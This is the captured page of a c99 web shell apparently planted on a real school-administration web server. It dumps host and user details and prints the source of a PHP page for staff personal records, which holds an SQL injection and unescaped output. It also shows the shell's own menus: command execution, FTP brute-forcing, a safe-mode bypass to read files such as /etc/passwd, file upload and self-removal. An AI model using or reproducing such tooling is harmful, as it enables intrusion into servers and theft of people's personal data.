!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/_manage_depart/   drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     PersonalDetail.php (11.27 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
session_start
();

 if (
session_is_registered("valid_user")&&session_is_registered("Priority") )
 {
include(
"../include/FunctionDB.php");
include(
"../include/Function.php");
include(
"admin_menu.php");
ConnectDB();
$Username $valid_user;
$Password $password;
$sql "Select * From personal_tb Where Teacher_code='$Teacher_code' ";
$result mysql_query($sql) or die(" Error").mysql_error();
$rs mysql_fetch_array($result)
?>
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">

<style type="text/css">
<!--
.style1 {color: #FF0000}
.style2 {
    font-size: 14px;
    font-family: Tahoma;
}
.style4 {
    color: #0000FF;
    font-weight: bold;
    font-size: 16px;
}
.style5 {font-size: 14px}
.style6 {
    color: #FF0000;
    font-weight: bold;
    font-size: 16px;
}
-->
</style>
<table width="814" border="0" cellpadding="0" cellspacing="0">
  <tr>
    <td width="814"><br />
        <fieldset>
        <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="menu_manage.php" >หน้าหลัก</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="PersonalData.php?Teacher_code=<? echo $rs[Teacher_code?>">ข้อมูลส่วนตัวบุลากร</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="EducationData.php?Teacher_code=<? echo $rs[Teacher_code?>">ข้อมูลวุฒิบุคลากร</a><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" />รายละเอียดประวัติบุคลากร</font></legend>
          <label></label>
        <div align="center">
          <form id="form1" name="form1" method="post" action="InsertSalary.php">
            <p align="left"><font size="2" face="Tahoma"><img src="../picture/previous.gif" onclick="window.history.back()"  width="85" height="22" border="0" /></font></p>
            <table width="95%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC" style="border:0px solid gray">
              <!--DWLayoutTable-->
              <tr bgcolor="#CEE6FF">
                <td colspan="4" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
              </tr>
              <tr bordercolor="#E7FAFE">
                <td height="20" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><div align="center"><font color="#003300" size="2" face="Tahoma">เลขที่บัตรประชาชน</font></div></td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><font color="#003366" size="2" face="Tahoma"><? echo $rs[Citizen_id]?></font></td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
              </tr>
              <tr bordercolor="#E7FAFE">
                <td width="195" height="20" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><div align="center"><font color="#003300" size="2" face="Tahoma">ชื่อ-นามสกุล</font></div></td>
                <td width="19" nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
                <td width="313" nowrap="nowrap" bgcolor="#FFFFFF"><font color="#003366" size="2" face="Tahoma"><? echo $rs[First_name?> &nbsp; <? echo $rs[Teacher_name?> <? echo $rs[Teacher_lastname?> </font></td>
                <td width="205" rowspan="7" nowrap="nowrap" bgcolor="#FFFFFF"><?php
        
echo"<center>";
        echo
"<img src=\"$rs[Img1]\" width=\"150\" height=\"180\" >";
        echo
"</center>";
       
?></td>
              </tr>
              <tr bordercolor="#FFFFFF">
                <td height="20" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><div align="center"><font color="#003300" size="2" face="Tahoma">วัน/เดือน/ปี 
                ที่เกิด</font></div></td>
                <td width="19" nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
                <td width="313" nowrap="nowrap" bgcolor="#FFFFFF"><font color="#003366" size="2" face="Tahoma">
                  <?php 
    $year 
$rs[DateBirth];
    
$yearthai explode("-",$year);
    
$day =   intval($yearthai[2]);
    
$month =  intval($yearthai[1]);
    
$year =   intval($yearthai[0]);     
    
$yearthai =  $year ;
     
$month TxtThaiMonth($month);
     echo
"<font color=\"#000000\">วันที่ </font>"."$day"." <font color=\"#000000\"> เดือน </font>"."$month"."<font color=\"#000000\"> ปี พ.ศ. </font>"."$yearthai";
    
?>
                </font></td>
              </tr>
              <tr bordercolor="#FFFFFF">
                <td height="20" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><div align="center"><font color="#003300" size="2" face="Tahoma">อายุ</font></div></td>
                <td width="19" nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
                <td width="313" nowrap="nowrap" bgcolor="#FFFFFF"><font color="#003366" size="2" face="Tahoma">
                  <?php //// Show Age
      
$age =  $rs[DateBirth];
      
$year =  explode("-",$age);
      
$year =   intval($year[0]);    
      
$year $year 543;
      
$currentyear date("Y");
    
//  $currentyear =   intval($currentyear[0]);          
      
$age $currentyear $year ;
      echo
"$age";
      
?>
                  &nbsp;<font color="#003300">&nbsp;ปี </font></font></td>
              </tr>
              <tr bordercolor="#E7FAFE">
                <td height="20" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><div align="center"><font size="2" face="Tahoma">เพศ</font></div></td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><font color="#003366" size="2" face="Tahoma"><? echo $rs[Sex]?></font></td>
              </tr>
              <tr bordercolor="#E7FAFE">
                <td height="20" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><div align="center"><font size="2" face="Tahoma">เชื้อชาติ</font></div></td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><font color="#003366" size="2" face="Tahoma"><? echo $rs[Nationality]?>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color="#000000">สัญชาต</font>ิ 
                  &nbsp;&nbsp; <? echo $rs[Nation]?></font></td>
              </tr>
              <tr bordercolor="#E7FAFE">
                <td height="20" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><div align="center"><font size="2" face="Tahoma">ศาสนา</font></div></td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><font color="#003366" size="2" face="Tahoma"><? echo $rs[Religion]?></font></td>
              </tr>
              <tr bordercolor="#E7FAFE">
                <td height="20" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><div align="center"><font color="#003300" size="2" face="Tahoma">ภูมิลำเนา</font></div></td>
                <td width="19" nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
                <td width="313" nowrap="nowrap" bgcolor="#FFFFFF"><font color="#003366" size="2" face="Tahoma"><? echo nl2br($rs[Address])?> </font></td>
              </tr>
              <tr bordercolor="#E7FAFE">
                <td height="20" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><div align="center"><font size="2" face="Tahoma">สถานภาพ 
                บิดา - มารดา</font></div></td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="0">
                    <tr>
                      <td width="50%"><font color="#003366" size="2" face="Tahoma"><? echo $rs[Status2]?></font><font size="2" face="Tahoma">&nbsp; </font></td>
                      <td width="50%"><font color="#003366" size="2" face="Tahoma"><? echo $rs[Status3]?></font><font size="2" face="Tahoma">&nbsp; </font></td>
                    </tr>
                </table></td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
              </tr>
              <tr bordercolor="#E7FAFE">
                <td height="20" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><div align="center"><font color="#000000" size="2" face="Tahoma">ชื่อ 
                - นามสกุล บิดา</font></div></td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><font color="#003366" size="2" face="Tahoma"><? echo $rs[Father_name]?></font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color="#000000" size="2" face="Tahoma">&nbsp;มารดา&nbsp;&nbsp;&nbsp;</font><font color="#003366" size="2" face="Tahoma"><? echo $rs[Mother_name]?></font></td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
              </tr>
              <tr bordercolor="#E7FAFE">
                <td height="20" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><div align="center"><font size="2" face="Tahoma">สถานภาพ 
                คู่สมรส </font></div></td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><font color="#003366" size="2" face="Tahoma"><? echo $rs[Status]?></font></td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
              </tr>
              <tr bordercolor="#E7FAFE">
                <td height="20" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><div align="center"><font size="2" face="Tahoma">ชื่อ 
                - นามสกุล คู่สมรส</font></div></td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
              </tr>
              <tr bordercolor="#E7FAFE">
                <td height="20" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><div align="center"><font size="2" face="Tahoma">จำนวนบุตร</font></div></td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
                <td nowrap="nowrap" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
              </tr>
              <tr bgcolor="#CEE6FF">
                <td height="20" colspan="4" bgcolor="#FFFFFF"><!--DWLayoutEmptyCell-->&nbsp;</td>
              </tr>
            </table>
          </form>
        </div>
      </fieldset>
      <br />
        <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>หมายเหตุ :</b> ใช้เมาส์คลิกที่ชื่อ<br />
    </font></td>
  </tr>
</table>
<?php 
    
}
else
{
       echo
"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n";
       echo
"Please Login ";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.015 ]--